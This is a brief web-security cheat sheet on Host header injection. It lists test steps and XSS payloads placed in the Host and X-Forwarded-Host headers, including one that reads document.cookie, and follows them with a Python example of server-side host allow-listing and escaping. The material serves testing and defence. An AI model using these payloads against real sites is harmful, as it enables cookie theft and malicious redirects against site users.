Host Header Injection
- Simple Host Header Injection
Change the Host header in the request to www.bing.com; if the response redirects to bing, then it is vulnerable.
Also try setting it to localhost.
- Host Header Injection to XSS
Host: bing.com"></script><script>alert(1)</script><"
Host: <script>alert('foo');</script>.example.com
- X-Forwarded-Host Header Injection to XSS
X-Forwarded-Host: bing.com"><img src/onerror=prompt(document.cookie)>
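
The server-side fix for all three cases above, as an added example (not from the original page): validate Host against an allow-list, ignore X-Forwarded-Host unless a trusted proxy sets it, and escape the value on output. The names ALLOWED_HOSTS, validate_host, effective_host and handle, the example.com hostnames and the /static/app.js path are assumptions made for illustration.

```python
import html
import re

# Assumption: the names this site is really served under.
ALLOWED_HOSTS = {"example.com", "www.example.com"}
# Hostname characters only, with an optional port; no quotes, brackets or spaces.
HOST_SYNTAX = re.compile(r"[a-z0-9]([a-z0-9.-]{0,251}[a-z0-9])?(:\d{1,5})?")

def validate_host(value):
    """Return the bare lower-cased hostname if well formed and allow-listed, else None."""
    if value is None:
        return None
    value = value.strip().lower()
    if not HOST_SYNTAX.fullmatch(value):
        return None
    name = value.split(":", 1)[0]
    return name if name in ALLOWED_HOSTS else None

def effective_host(headers, behind_trusted_proxy=False):
    """Choose the host used for redirects and absolute URLs.

    X-Forwarded-Host is ignored unless a trusted proxy sets it, and is then
    validated exactly like Host. Header names are matched case-sensitively
    here to keep the example short.
    """
    if behind_trusted_proxy and "X-Forwarded-Host" in headers:
        return validate_host(headers["X-Forwarded-Host"])
    return validate_host(headers.get("Host"))

def handle(headers, behind_trusted_proxy=False):
    """Return (status, body); the body embeds an absolute URL built from the host."""
    host = effective_host(headers, behind_trusted_proxy)
    if host is None:
        return 400, "Bad Request"
    url = "https://" + host + "/static/app.js"  # hypothetical asset path
    # Escape on output as a second layer, even though the host is allow-listed.
    return 200, '<script src="' + html.escape(url, quote=True) + '"></script>'

if __name__ == "__main__":
    # Constructed requests using the header values listed above.
    samples = [
        {"Host": "www.example.com"},
        {"Host": "www.bing.com"},
        {"Host": "localhost"},
        {"Host": 'bing.com"></script><script>alert(1)</script><"'},
        {"Host": "<script>alert('foo');</script>.example.com"},
    ]
    for request in samples:
        print(request, "->", handle(request))
```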